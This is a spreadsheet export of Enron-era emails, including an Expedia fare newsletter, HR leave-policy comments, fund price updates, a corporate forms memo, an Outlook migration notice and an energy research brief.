Fares found by Expedia shoppers: $ 194  - $ 614  (includes tax) _x000D_
http://www.expedia.com/pubspec/scripts/eap.asp?GOTO=FareCmpSearch&amp;FrAirport=DEN&amp;ToAirport=IAH&amp;rfrr=-1410&amp;EAPid=8510-1_x000D_
_x000D_
Check hotel rates in this destination city: _x000D_
http://www.expedia.com/pubspec/scripts/eap.asp?GOTO=HotSearch&amp;CityName=Denver%2c+CO%2c+United+States+%28DEN%2dDenver+Intl%2e%29&amp;rfrr=-1410 _x000D_
_x000D_
_x000D_
- Houston, TX, United States (IAH-Bush Intercontinental) to Vail, CO, United States (EGE-Eagle County) _x000D_
Airlines' lowest published fare: $ 292  (plus tax) _x000D_
http://www.expedia.com/pubspec/scripts/eap.asp?GOTO=FARECALENDAR&amp;FrAirport=IAH&amp;ToAirport=EGE&amp;NumAdult=1&amp;rfrr=-1410&amp;EAPid=8512-1_x000D_
_x000D_
Fares found by Expedia shoppers: Sorry, fare not found _x000D_
http://www.expedia.com/pubspec/scripts/eap.asp?GOTO=FareCmpSearch&amp;FrAirport=IAH&amp;ToAirport=EGE&amp;rfrr=-1410&amp;EAPid=8510-1_x000D_
_x000D_
Check hotel rates in this destination city: _x000D_
http://www.expedia.com/pubspec/scripts/eap.asp?GOTO=HotSearch&amp;CityName=Vail%2c+CO%2c+United+States+%28EGE%2dEagle+County%29&amp;rfrr=-1410 _x000D_
_x000D_
_x000D_
_x000D_
============================================================_x000D_
EXPEDIA'S TOP TRAVEL DEALS_x000D_
============================================================_x000D_
_x000D_
FLIGHT DEALS _x000D_
Fly Lufthansa to Europe for as little as $242 roundtrip: _x000D_
http://www.expedia.com/daily/advert/LufthansaFeb2002/default.asp?rfrr=-1410_x000D_
_x000D_
Save up to 60% on your flight, with Expedia Bargain Fares:_x000D_
http://www.expedia.com/daily/promos/BargainFares/default.asp?rfrr=-1410_x000D_
_x000D_
See more flight deals and fare sales:_x000D_
http://www.expedia.com/daily/deals/flights/default.asp?rfrr=-1410_x000D_
_x000D_
_x000D_
VACATION PACKAGE DEALS_x000D_
Ski Utah! Up to 30% off hotels with a package -- from $242:_x000D_
http://www.expedia.com/daily/promos/packages/utah_ski/default.asp?rfrr=-1410_x000D_
 _x000D_
Orlando -- Three nights close to all the action, from $368:_x000D_
http://www.expedia.com/pubspec/scripts/eap.asp?GOTO=PKGDEALDETAILS&amp;DispSection=28&amp;DestId=178294&amp;rfrr=-1410_x000D_
_x000D_
Las Vegas bargain deal -- Air, two nights' hotel from $168:_x000D_
http://www.expedia.com/daily/deals/packages/seasonal/lvstore7.asp?rfrr=-1410_x000D_
_x000D_
Oahu -- Last-minute five-star, four-night trip from $910:_x000D_
http://www.expedia.com/pubspec/scripts/eap.asp?GOTO=PKGDEALDETAILS&amp;DispSection=7&amp;DestId=180077&amp;rfrr=-1410_x000D_
_x000D_
Boston -- Get air and three four-star nights from $386:_x000D_
http://www.expedia.com/pubspec/scripts/eap.asp?GOTO=PKGDEALDETAILS&amp;DispSection=25&amp;DestId=178239&amp;rfrr=-1410_x000D_
_x000D_
See our best vacation deals:_x000D_
http://www.expedia.com/daily/deals/packages.asp?rfrr=-1410_x000D_
_x000D_
_x000D_
HOTEL DEALS_x000D_
Orlando's best hotel deals! Family fun from $45 a night:_x000D_
http://www.expedia.com/daily/deals/hotel/orlando.asp?rfrr=-1410_x000D_
_x000D_
Hawaii hotels from $68 -- Oahu, Maui, Kauai, the Big Island:_x000D_
http://www.expedia.com/daily/deals/hotel/hawaii.asp?rfrr=-1410_x000D_
_x000D_
Save an extra 25% on Wyndham/Expedia Special Rate hotels:_x000D_
http://www.expedia.com/daily/promos/wyndhamgeneral/default.asp?rfrr=-1410_x000D_
_x000D_
See our best hotel deals in 40 top destinations:_x000D_
http://www.expedia.com/daily/deals/hoteldeals.asp?rfrr=-1410_x000D_
_x000D_
_x000D_
CRUISE DEALS_x000D_
Get a cash rebate on any Holland America cruise:_x000D_
http://www.expedia.com/promos/hollandamerica/default.asp?rfrr=-1410_x000D_
_x000D_
Four-day Bahamas cruise (Port Canaveral) from $399:_x000D_
http://cruises.expedia.com/cruises/show_cruise.asp?d=2/1/2002&amp;d2=6/1/2002&amp;i=776745&amp;c=44&amp;v=232&amp;pex=610&amp;rfrr=-1410_x000D_
_x000D_
Seven-day eastern Caribbean cruise from $599. New ship!_x000D_
http://cruises.expedia.com/cruises/show_cruise.asp?d=2/1/2002&amp;d2=10/1/2002&amp;i=833518&amp;c=1&amp;v=398&amp;pex=611&amp;rfrr=-1410_x000D_
_x000D_
7-day Hawaiian Islands cruise (Honolulu) from $750:_x000D_
http://cruises.expedia.com/cruises/show_cruise.asp?d=&amp;i=832294&amp;c=34&amp;v=402&amp;pex=614&amp;rfrr=-1410_x000D_
_x000D_
See our special discounted cruise deals:_x000D_
http://cruises.expedia.com/promotion/lmcruisespecials.html?rfrr=-1410_x000D_
_x000D_
_x000D_
CAR RENTAL DEALS_x000D_
Save $15 on a five-day rental from Avis:_x000D_
http://www.expedia.com/daily/promos/ZINationwideFeb2002/default.asp?rfrr=-1410_x000D_
_x000D_
_x000D_
============================================================_x000D_
EXPLORE EXPEDIA_x000D_
============================================================_x000D_
_x000D_
Prime Utah powder -- Ski Alta and Snowbird on one ticket!_x000D_
http://www.expedia.com/daily/ski/news/September2001/September26-01AltaSnowbird.asp?rfrr=-1410_x000D_
_x000D_
Waikiki 360-degree Tour -- See Hawaii's most famous beach:_x000D_
http://www.expedia.com/daily/360/honolulu/default.asp?rfrr=-1410_x000D_
_x000D_
Las Vegas Slide Show -- Sunshine, red rocks, and 24/7 fun_x000D_
http://www.expedia.com/daily/slideshow/LasVegas/default.asp?rfrr=-1410_x000D_
_x000D_
_x000D_
============================================================_x000D_
 _x000D_
UNSUBSCRIBE _x000D_
If you do not wish to receive any further promotional e-mails from us, _x000D_
please click here: _x000D_
http://www.expedia.com/pub/agent.dll?qscr=info&amp;rfrr=-1410 _x000D_
_x000D_
Or simply reply to this mail with "unsubscribe" in the subject line. _x000D_
_x000D_
CONTACT US _x000D_
If you'd like to give us feedback, please click here:_x000D_
https://www.expedia.com/pub/agent.dll?qscr=fbak&amp;rfrr=-1410 _x000D_
_x000D_
For additional assistance, visit the Expedia.com Customer _x000D_
Support Center: _x000D_
http://www.expedia.com/daily/service/default.asp?rfrr=-1410 _x000D_
_x000D_
A NOTE ABOUT PRICES _x000D_
Prices are subject to availability and subject to change without notice. _x000D_
Prices shown may not include applicable taxes, fees and fuel surcharges. _x000D_
The airlines' lowest published fares are the lowest roundtrip fares published _x000D_
by the airlines for your routes. These fares may not be available on the _x000D_
days you wish to travel. Our Fare Calendar shows you when these fares _x000D_
are available. The fares shown as found by Expedia.com customers are _x000D_
listed to help you determine the ideal price for your route. _x000D_
_x000D_
(c) 2002 Expedia, Inc. All rights reserved. _x000D_
_x000D_
_x000D_
This mail was sent to: kevin.hyatt@ENRON.COM_x000D_
Message-Id: &lt;20020219001107.B45F.261637-487@customermail.expedia.com&gt;_x000D_
</t>
  </si>
  <si>
    <t>Mon, 1 May 2000 03:38:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'dave.samuels@enron.com', 'michael.danielson@enron.com', 'rahil.jafry@enron.com', 'julie.ferrara@enron.com'})</t>
  </si>
  <si>
    <t>Viant Corporation</t>
  </si>
  <si>
    <t>We have received the executed Confidentiality Agreement between the _x000D_
referenced Counterparty and ENA dated April 27, 2000.  The copy will be _x000D_
forwarded to Dave Samuels._x000D_
_x000D_
It is my intention that Dave Samuels maintain a complete file of all the _x000D_
Confidentiality Agreements for EnronOnline.  If there is some otherr person _x000D_
than Dave who sould maintain the central file repository for EnronOnline _x000D_
Confidentiality Agreements please this let me know.</t>
  </si>
  <si>
    <t>Thu, 13 Jan 2000 10:46:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Leave Policy</t>
  </si>
  <si>
    <t xml:space="preserve">Sharon/Kriste,_x000D_
_x000D_
If there are going to be revisions to the leave policy, I suggest that we _x000D_
make major ones, including a segregation of FMLA leave from other types of _x000D_
leave --i.e., two separate policies.  Let's talk about this on Tuesday ----- _x000D_
Majorly important!!_x000D_
_x000D_
Michelle_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Sharon Butcher@ENRON_x000D_
01/13/2000 05:38 PM_x000D_
To: Michelle Cash/HOU/ECT@ECT, Kriste Sullivan/Corp/Enron@ENRON_x000D_
cc:  _x000D_
Subject: Leave Policy_x000D_
_x000D_
Dear Michelle and Kriste:   Please review and let me have your comments.   _x000D_
Thanks.  Sharon_x000D_
---------------------- Forwarded by Sharon Butcher/Corp/Enron on 01/13/2000 _x000D_
05:32 PM ---------------------------_x000D_
_x000D_
_x000D_
Elaine Paul_x000D_
12/14/99 08:57 PM_x000D_
To: Sharon Butcher/Corp/Enron@ENRON_x000D_
cc: Cynthia Barrow/HR/Corp/Enron@ENRON, Susan Tosoni/HR/Corp/Enron@ENRON _x000D_
_x000D_
Subject: Leave Policy_x000D_
_x000D_
Here are a few edits to the Approved Time Off and Leaves of Absence policy._x000D_
_x000D_
Benefits has not included a "second or third opinion by another health care _x000D_
provider paid for by the Company" as it has significant implications to our _x000D_
LTD plan and has created at least one problem that I am aware of in the past._x000D_
We will need to think through what the certification document might look like _x000D_
and would look to you for some guidelines.   The concern I have is around _x000D_
privacy and use of information given potential regulation._x000D_
Cynthia believes that we should run FMLA concurrent with sick time.  I agree _x000D_
and have noted that in the document.   _x000D_
_x000D_
Sharon, could you please review the wording to ensure I haven't missed _x000D_
something here from a legal perspective.  I will follow-up with you by phone _x000D_
shortly.  _x000D_
_x000D_
Susan, here are the "long-since promised" wording changes we propose.     _x000D_
_x000D_
Thanks,_x000D_
_x000D_
Elaine  _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 11 Oct 2000 06:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'scott.earnest@enron.com'})</t>
  </si>
  <si>
    <t>Re: THANKS!!</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks for asking me.  I enjoyed the opportunity to meet your team and to _x000D_
talk with them.  _x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Scott Earnest                           10/11/2000 12:25 PM_x000D_
	_x000D_
_x000D_
To: Sally Beck_x000D_
cc:  _x000D_
Subject: THANKS!!_x000D_
_x000D_
I just wanted to thank you for taking the time to come out and speak at my _x000D_
management offsite.   I know you had multiple things going on between travel, _x000D_
work and family.  Everyone enjoyed the time away and I think we made some _x000D_
positive steps in the right direction.  _x000D_
_x000D_
_x000D_
Thanks Again,_x000D_
_x000D_
Scott_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 16 Dec 1999 00:14:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'maureen.raymond@enron.com', 'ronald.slimp@enron.com'})</t>
  </si>
  <si>
    <t>Sneak Preview</t>
  </si>
  <si>
    <t xml:space="preserve">FYI_x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 12/16/99 _x000D_
08:13 AM ---------------------------_x000D_
_x000D_
_x000D_
"Edna OConnell" &lt;esai@ma.ultranet.com&gt; on 12/14/99 10:52:02 AM_x000D_
Please respond to esai@ma.ultranet.com_x000D_
To: ednao@esaibos.com_x000D_
cc:  (bcc: Vince J Kaminski/HOU/ECT)_x000D_
Subject: Sneak Preview_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Edna O'Connell_x000D_
Office Manager_x000D_
ESAI_x000D_
301 Edgewater Place, Suite 108_x000D_
Wakefield, MA 01880_x000D_
(781) 245-2036_x000D_
(781) 245-8706_x000D_
ednao@esaibos.com_x000D_
_x000D_
 - sneakpreview.PDF_x000D_
</t>
  </si>
  <si>
    <t>Mon, 7 Feb 2000 03:33:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'julie.haviland@painewebber.com'})</t>
  </si>
  <si>
    <t>The muni bond that we bought today is the following:_x000D_
_x000D_
Grant Co. Washington_x000D_
Coupon 5.875%_x000D_
Due 01/01/31_x000D_
Callable: 01/01/06 at 102.00_x000D_
YTM: 6.25%_x000D_
_x000D_
I have already put a copy of your grant summary in the mail._x000D_
_x000D_
If you have any questions, please call me at (713) 654-0324._x000D_
_x000D_
Thanks, Julie</t>
  </si>
  <si>
    <t>Tue, 8 Aug 2000 08:29:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Tragic</t>
  </si>
  <si>
    <t>I find this joke even funnier coming from an Aggie grad.  _x000D_
_x000D_
Robin</t>
  </si>
  <si>
    <t>Fri, 2 Mar 2001 05:23:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'janice.moore@enron.com', 'kaye.ellis@enron.com', 'genia.fitzgerald@enron.com', 'linda.simmons@enron.com', 'richard.sanders@enron.com', 'lou.stoler@enron.com', 'carolyn.george@enron.com', 'shonnie.daniel@enron.com', 'stephanie.panus@enron.com', 'jenny.helton@enron.com', 'mark.taylor@enron.com', 'mark.greenberg@enron.com', 'ed.iii@enron.com', 'gerald.nemec@enron.com', 'sara.shackleton@enron.com', 'jan.king@enron.com', 'james.grace@enron.com', 'janette.elbertson@enron.com', 'kathleen.carnahan@enron.com', 'mary.ogden@enron.com', 'kimberlee.bennick@enron.com', 'suzanne.adams@enron.com', 'linda.guinn@enron.com', 'samantha.boyd@enron.com', 'lance.schuler-legal@enron.com', 'larry.pardue@enron.com', 'sandi.braband@enron.com', 'taffy.milligan@enron.com', 'bob.carter@enron.com', 'susan.bailey@enron.com', 'marcus.nettelton@enron.com', 'sheila.tweed@enron.com', 'coralina.rivera@enron.com', 'janet.moore@enron.com', 'barbara.gray@enron.com', 'daniel.rogers@enron.com', 'mark.haedicke@enron.com', 'dan.hyvl@enron.com', 'pat.radford@enron.com', 'wayne.gresham@enron.com', 'merrill.haas@enron.com', 'samantha.ferguson@enron.com', 'kay.mann@enron.com', 'shawna.flynn@enron.com', 'david.portz@enron.com', 'julia.murray@enron.com', 'alan.aronowitz@enron.com', 'steve.hooser@enron.com', 'matt.maxwell@enron.com', 'leslie.hansen@enron.com', 'stuart.zisman@enron.com', 'nancy.corbet@enron.com', 'jeffrey.hodge@enron.com', 'sarah.bruck@enron.com', 'peggy.banczak@enron.com', 'becky.spencer@enron.com', 'anne.koehler@enron.com', 'eric.gillaspie@enron.com', 'barton.clark@enron.com', 'laurie.mayer@enron.com', 'gail.brownfeld@enron.com', 'angela.davis@enron.com', 'stacy.dickson@enron.com', 'robert.walker@enron.com', 'kay.young@enron.com', 'debra.perlingiere@enron.com', 'harry.collins@enron.com', 'nony.flores@enron.com', 'michael.robison@enron.com', 'peter.vecchio@enron.com', 'michelle.cash@enron.com', 'lisa.mellencamp@enron.com', 'travis.mccullough@enron.com', 'karen.jones@enron.com', 'brenda.whitehead@enron.com', 'deb.korkmas@enron.com', 'twanda.sweet@enron.com', 'dale.rasmussen@enron.com', 'martha.braddy@enron.com', 'ann.white@enron.com', 'roger.balog@enron.com', 'elizabeth.sager@enron.com', 'teresa.bushman@enron.com', 'ned.crady@enron.com', 'john.viverito@enron.com', 'dan.lyons@enron.com', 'shari.stack@enron.com', 'mary.heinitz@enron.com', 'michelle.blaine@enron.com', 'tana.jones@enron.com', 'carol.clair@enron.com', 'sheri.cromwell@enron.com', 'dina.snow@enron.com', 'robert.bruce@enron.com'})</t>
  </si>
  <si>
    <t>Corp Services Authorization Memos</t>
  </si>
  <si>
    <t xml:space="preserve">See new authorization forms attached below.  Deb_x000D_
_x000D_
Deb Korkmas_x000D_
EWS Legal Dept._x000D_
1400 Smith Street, Room 3819_x000D_
Houston, TX  77002_x000D_
Phone:  713-853-5448_x000D_
Fax:  713-646-3393_x000D_
----- Forwarded by Deb Korkmas/HOU/ECT on 03/02/2001 01:22 PM -----_x000D_
_x000D_
	Geneva Holland/ENRON@enronXgate_x000D_
	02/23/2001 05:25 PM_x000D_
		 _x000D_
		 To: John Ale/HOU/AZURIX@AZURIX, Elizabeth Labanowski/ENRON@enronXgate, Bruce _x000D_
Lundstrom/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Marc Manly/HOU/EES@EES, Jordan _x000D_
Mintz/ENRON@enronXgate, Kristina Mordaunt/Enron Communications@Enron _x000D_
Communications, Eric Newell/EWC/Enron@ENRON, Janet Place/NPNG/Enron@ENRON, _x000D_
Molly Sample/Houston/Eott@Eott, John _x000D_
Schwartzenburg/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Vicki Sharp/HOU/EES@EES, _x000D_
Stephen Wallace/Corp/Enron@ENRON, Rob Walls/ENRON@enronXgate, Randy _x000D_
Young/NA/Enron@Enron, Denise Almoina/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, _x000D_
Martha Braddy/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, William E _x000D_
Brown/ENRON@enronXgate, Sarah Bruck/ENRON_DEVELOPMENT@ENRON_DEVELOPMENt, _x000D_
Cindy Buckley/LON/ECT@ECT, Kathleen Carnahan/NA/Enron@Enron, Kim _x000D_
Collins/HOU/EES@EES, Julie Delahay/EWC/Enron@ENRON, Rosy _x000D_
Duron/ENRON@enronxgate, Carol Essig/ENRON@enronXgate, Nony _x000D_
Flores/HOU/ECT@ECT, Brenda L Funk/ENRON@enronXgate, Lauren _x000D_
Hagerty/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Barbara Hankins/HOU/EES@EES, Ed _x000D_
B Hearn III/HOU/ECT@ECT, Mary J Heinitz/HOU/ECT@ECT, Robin Hill/Enron _x000D_
Communications@Enron Communications, Gina Karathanos/ENRON@enronXgate, Sue _x000D_
Kelly/LON/ECT@ECT, Deb Korkmas/HOU/ECT@ECT, Matt Maxwell/Corp/Enron@ENRON, _x000D_
Darlene McKeever/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Wyndel _x000D_
McNamara/NA/Enron@ENRON, Stephanie Moorehead/HOU/EES@EES, Nancy _x000D_
Muchmore/NA/Enron@Enron, Mary Ogden/HOU/ECT@ECT, Larry _x000D_
Pardue/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Claudia Santos/Corp/Enron@Enron, _x000D_
Tami Scrudder/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Norma _x000D_
Tidrow/HOU/AZURIX@AZURIX_x000D_
		 cc: Hardie Davis/ENRON@enronXgate, Rebecca Carter/Corp/Enron@ENRON, Lillian _x000D_
Bailey/ENRON@enronXgate, Teresa Callahan/ENRON@enronXgate, Kate _x000D_
Cole/ENRON@enronXgate, Irene Garcia/ENRON@enronXgate, LaShonda _x000D_
LaDay/ENRON@enronXgate, Peggy Miller/ENRON@enronXgate, Lori _x000D_
Pinder/ENRON@enronXgate, Renee Rodriguez/ENRON@enronXgate, Tanya _x000D_
Sanford/ENRON@enronXgate_x000D_
		 Subject: Corp Services Authorization Memos_x000D_
_x000D_
Attached are 3 updated Word forms for requesting new US entities (Corp, LLC, _x000D_
LP).  Unless you have access to our automated HotDocs system for requesting _x000D_
Secretary of State corporate activities, please use the attached forms (and _x000D_
delete data files for older versions).  Although these forms are not as user _x000D_
friendly as our HotDocs templates, they have been conformed as nearly as _x000D_
possible to the HotDocs forms, and are now as automated as MicroSoft Word _x000D_
will allow.  I think you will find these a great improvement over our old _x000D_
forms.  Please forward these new forms to anyone in your group who might need _x000D_
to create a new domestic entity._x000D_
_x000D_
I continue work on HotDocs templates and Word forms for authorization of US _x000D_
mergers, acquisitions, name changes, and for similar activities for non-US _x000D_
entities, and will make those available to you ASAP.  In the meantime, if you _x000D_
have any questions or comments regarding Corp Services forms, please contact _x000D_
me via email or call me at Ext 37291._x000D_
_x000D_
_x000D_
Geneva K. Holland_x000D_
Asst Secretary &amp; Mgr Corp Svcs_x000D_
(713)853-7291_x000D_
EB4802_x000D_
</t>
  </si>
  <si>
    <t>Mon, 13 Mar 2000 00:37:00 -0800 (PST)</t>
  </si>
  <si>
    <t>MUNDER FUNDS DAILY PRICE (NAV) CLOSINGS</t>
  </si>
  <si>
    <t xml:space="preserve">Did you ever receive any paperwork from this fund on behalf of Zachary?  How _x000D_
was NY?  Mother sure is talkative these days.  Hope all is well  Sass_x000D_
---------------------- Forwarded by Sara Shackleton/HOU/ECT on 03/13/2000 _x000D_
08:32 AM ---------------------------_x000D_
_x000D_
_x000D_
contact@munder.com on 03/10/2000 10:32:32 PM_x000D_
To: undisclosed-recipients:;_x000D_
cc:  _x000D_
Subject: MUNDER FUNDS DAILY PRICE (NAV) CLOSINGS_x000D_
_x000D_
_x000D_
_x000D_
NETNET_x000D_
03/06/2000 : $102.65 [MNNAX] : $101.35 [MNNBX] : $101.41 [MNNCX] :_x000D_
03/07/2000 : $103.04 [MNNAX] : $101.74 [MNNBX] : $101.79 [MNNCX] :_x000D_
03/08/2000 : $105.15 [MNNAX] : $103.82 [MNNBX] : $103.87 [MNNCX] :_x000D_
03/09/2000 : $108.42 [MNNAX] : $107.05 [MNNBX] : $107.10 [MNNCX] :_x000D_
03/10/2000 : $108.01 [MNNAX] : $106.64 [MNNBX] : $106.70 [MNNCX] :_x000D_
_x000D_
FUTURE TECH_x000D_
03/06/2000 : $ 19.70 [MTFAX] : $ 19.66 [MTFBX] : $ 17.78 [MTFTX] :_x000D_
03/07/2000 : $ 19.31 [MTFAX] : $ 19.27 [MTFBX] : $ 17.44 [MTFTX] :_x000D_
03/08/2000 : $ 19.45 [MTFAX] : $ 19.41 [MTFBX] : $ 17.56 [MTFTX] :_x000D_
03/09/2000 : $ 19.99 [MTFAX] : $ 19.95 [MTFBX] : $ 18.05 [MTFTX] :_x000D_
03/10/2000 : $ 20.15 [MTFAX] : $ 20.11 [MTFBX] : $ 18.19 [MTFTX] :_x000D_
_x000D_
_x000D_
_x000D_
If you have any questions, please call 1-800-4MUNDER._x000D_
_x000D_
To unsubscribe from this list, go to:_x000D_
     _x000D_
http://netnet.munder.com/subscribe.cgi?email=sshackl@enron.com&amp;unsubscribe=1_x000D_
This will immediately remove you from the list._x000D_
</t>
  </si>
  <si>
    <t>Mon, 21 Jan 2002 15:11:17 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'louise.kitchen@enron.com', 'f..calger@enron.com', 's..shively@enron.com', 'tim.belden@enron.com', 'm..presto@enron.com', 'rob.milnthorp@enron.com', 'greg.whalley@enron.com'})</t>
  </si>
  <si>
    <t>It's my turn, I've asked for nothing _x000D_
_x000D_
I need Caroline Abramo_x000D_
_x000D_
As well as her bonus we need_x000D_
_x000D_
100k and 100k contract._x000D_
_x000D_
A promotion to VP._x000D_
_x000D_
And she wants to report Calger and Milnthorp._x000D_
_x000D_
Hunter and I think it is very important.</t>
  </si>
  <si>
    <t>Thu, 19 Apr 2001 19:37:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>QUICK NOTE ABOUT PARKING</t>
  </si>
  <si>
    <t>Sorry to bother you with another note, but I've received so much reaction to my Tully parking notice, I'm writing again to tell you not to be concerned about being locked out of the Stadium if you're riding the bus back.  Some people think they're not going to get in by 11:00, and are concerned about not being able to get their cars out.  The last bus leaves Austin at 7 pm, and that would certainly get you there by 11:00, but if it doesn't for some reason, they're not going to lock the stadium until the last bus has dropped of its passengers.</t>
  </si>
  <si>
    <t>Fri, 4 May 2001 08:27:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'zimin.lu@enron.com', 'pinnamaneni.krishnarao@enron.com', 'christopher.burns@enron.com', 'loren.charbonneau@enron.com', 'john.freeman@enron.com', 'kevin.moore@enron.com', 'martin.lin@enron.com', 'rick.craig@enron.com', 'lilia.penagos@enron.com', 'geneva.patterson@enron.com', 'patricia.benington@enron.com', 'jack.netek@enron.com', 'nelson.neale@enron.com', 'alan.muntz@enron.com', 'max.brown@enron.com', 'shelly.jones@enron.com', 'michael.beyer@enron.com', 'doug.fletcher@enron.com', 'jose.marquez@enron.com', 'jason.sokolov@enron.com', 'jaesoo.lew@enron.com', 'kenneth.parkhill@enron.com', 'anita.dupont@enron.com', 'leann.walton@enron.com', 'janelle.russell@enron.com', 'kayla.bruzzese@enron.com', 'scott.coburn@enron.com', 'tanya.tamarchenko@enron.com', 'lance.cunningham@enron.com', 'rakesh.bharati@enron.com', 'sandeep.kohli@enron.com', 'tom.barkley@enron.com', 'joanne.smith@enron.com', 'zachary.sampson@enron.com', 'elena.chilkina@enron.com', 'anita.swanson@enron.com', 'larry.hill@enron.com', 'amitava.dhar@enron.com', 'alex.huang@enron.com', 'robert.fugel@enron.com', 'bernie.penner@enron.com', 'janet.vala-terry@enron.com', 'maureen.raymond@enron.com', 'paulo.issler@enron.com', 'sevil.yaman@enron.com', 'youyi.feng@enron.com', 'shirley.crenshaw@enron.com', 'stinson.gibner@enron.com', 'kate.lucas@enron.com', 'darla.steffes@enron.com', 'alliece.morris@enron.com', 'joe.zhou@enron.com', 'peter.lu@enron.com', 'laurie.willemyns@enron.com', 'wendy.koh@enron.com', 'carli.smith@enron.com', 'barry.tycholiz@enron.com', 'alison.smith@enron.com', 'gwyn.koepke@enron.com', 'michael.miller@enron.com', 'mike.roberts@enron.com', 'jerry.boston@enron.com', 'ladonna.dervin@enron.com', 'jody.warner@enron.com', 'patty.hermanek@enron.com', 'tom.halliburton@enron.com', 'tina.dunnaway@enron.com', 'bob.lee@enron.com', 'william.smith@enron.com', 'chonawee.supatgiat@enron.com', 'vince.kaminski@enron.com', 'judith.weakly@enron.com', 'leon.schneider@enron.com', 'richard.abramowicz@enron.com', 'michelle.lincoln@enron.com', 'jacquelyn.matthews@enron.com', 'bambi.heckerman@enron.com', 'sofya.tamarchenko@enron.com', 'susan.huston@enron.com', 'randy.cantrell@enron.com', 'anne.bike@enron.com', 'rabi.de@enron.com', 'ray.neppl@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Critical Migration Information:_x000D_
_x000D_
1. Your scheduled Outlook Migration Date is THE EVENING OF : May 7th_x000D_
2. You need to press the "Save My Data" button (only once) to send us your _x000D_
pre-migration information._x000D_
3. You must be connected to the network before you press the button._x000D_
4. If a POP-UP BOX appears, prompting you to "ABORT, CANCEL OR TRUST SIGNER" _x000D_
please  select TRUST SIGNER._x000D_
5. Any information you Add to your Personal Address Book, Journal or calendar _x000D_
after you click on the button will need to be manually re-added into Outlook _x000D_
after you have been migrated._x000D_
6. Clicking this button does not complete your migration to Outlook. Your _x000D_
migration will be completed  the evening of your migration date._x000D_
_x000D_
_x000D_
_x000D_
    Failure to click on the button means you WILL NOT get your Calendar, _x000D_
Contacts, Journal and ToDo information imported into Outlook the day of your _x000D_
migration and could result in up to a 2 week delay to restore this _x000D_
information._x000D_
_x000D_
If you encounter any errors please contact the resolution center @ _x000D_
713-853-1411 </t>
  </si>
  <si>
    <t>Thu, 26 Apr 2001 09:48:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>594290_x000D_
594291_x000D_
_x000D_
broker has may on these deals.  these were the ones i was missing on the _x000D_
previous email._x000D_
_x000D_
thanks</t>
  </si>
  <si>
    <t>Tue, 5 Jun 2001 19:00:12 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'nsights@cera.com'})</t>
  </si>
  <si>
    <t>DISTRIBUTED ENERGY--MICROTURBINES CONTINUE TO EVOLVE - CERA_x000D_
 Decision Brief</t>
  </si>
  <si>
    <t>_x000D_
Title: Microturbine Generator Test Program Report: Spring 2001 Update_x000D_
URL(s):_x000D_
http://www20.cera.com/eprofile?u=35&amp;m=2470_x000D_
_x000D_
***********************************************************************_x000D_
_x000D_
MICROTURBINES CONTINUE TO EVOLVE_x000D_
_x000D_
Extensive testing has shown that microturbine generator performance continues_x000D_
to improve as products mature. Southern California Edison's testing program has_x000D_
continued to generate useful information despite the company's financial_x000D_
problems._x000D_
_x000D_
*  The two Capstone units continue to operate reliably and perform well._x000D_
_x000D_
*  Honeywell's Parallon 75 unit is performing acceptably so far but has fallen_x000D_
slightly short of the manufacturer's claims._x000D_
_x000D_
*  Practical issues such as the need for adequate gas supply pressure; a lack_x000D_
of streamlined, standardized interconnection requirements; and emissions_x000D_
restrictions will play an important role in microturbine technology's future_x000D_
role in the marketplace._x000D_
_x000D_
**end**_x000D_
_x000D_
Follow above URL for complete report._x000D_
_x000D_
_x000D_
_x000D_
E-mail Category: Decision Brief_x000D_
CERA Knowledge Area(s): Distributed Energy_x000D_
_x000D_
CERA's Spring 2001 Roundtable event dates and agendas are now available_x000D_
at http://www20.cera.com/event_x000D_
_x000D_
***********************************************************************_x000D_
_x000D_
To make changes to your cera.com profile go to:_x000D_
http://www20.cera.com/client/updateaccount_x000D_
_x000D_
Forgot your username and password? Go to:_x000D_
http://www20.cera.com/client/forgot_x000D_
_x000D_
This electronic message and attachments, if any, contain information_x000D_
from Cambridge Energy Research Associates, Inc. (CERA) which is_x000D_
confidential and may be privileged. Unauthorized disclosure, copying,_x000D_
distribution or use of the contents of this message or any attachments,_x000D_
in whole or in part, is strictly prohibited._x000D_
Terms of Use: http://www20.cera.com/tos_x000D_
Questions/Comments: webmaster@cera.com_x000D_
Copyright 2001. Cambridge Energy Research Associates</t>
  </si>
  <si>
    <t>Mon, 5 Mar 2001 08:49:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Historical Curves</t>
  </si>
  <si>
    <t>What???  I'm confused.</t>
  </si>
  <si>
    <t>Wed, 29 Nov 2000 02:32:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mark.haedicke@enron.com', 'mark.greenberg@enron.com', 'alan.aronowitz@enron.com', 'donna.wackerle@enron.com', 'donna.lowry@enron.com'})</t>
  </si>
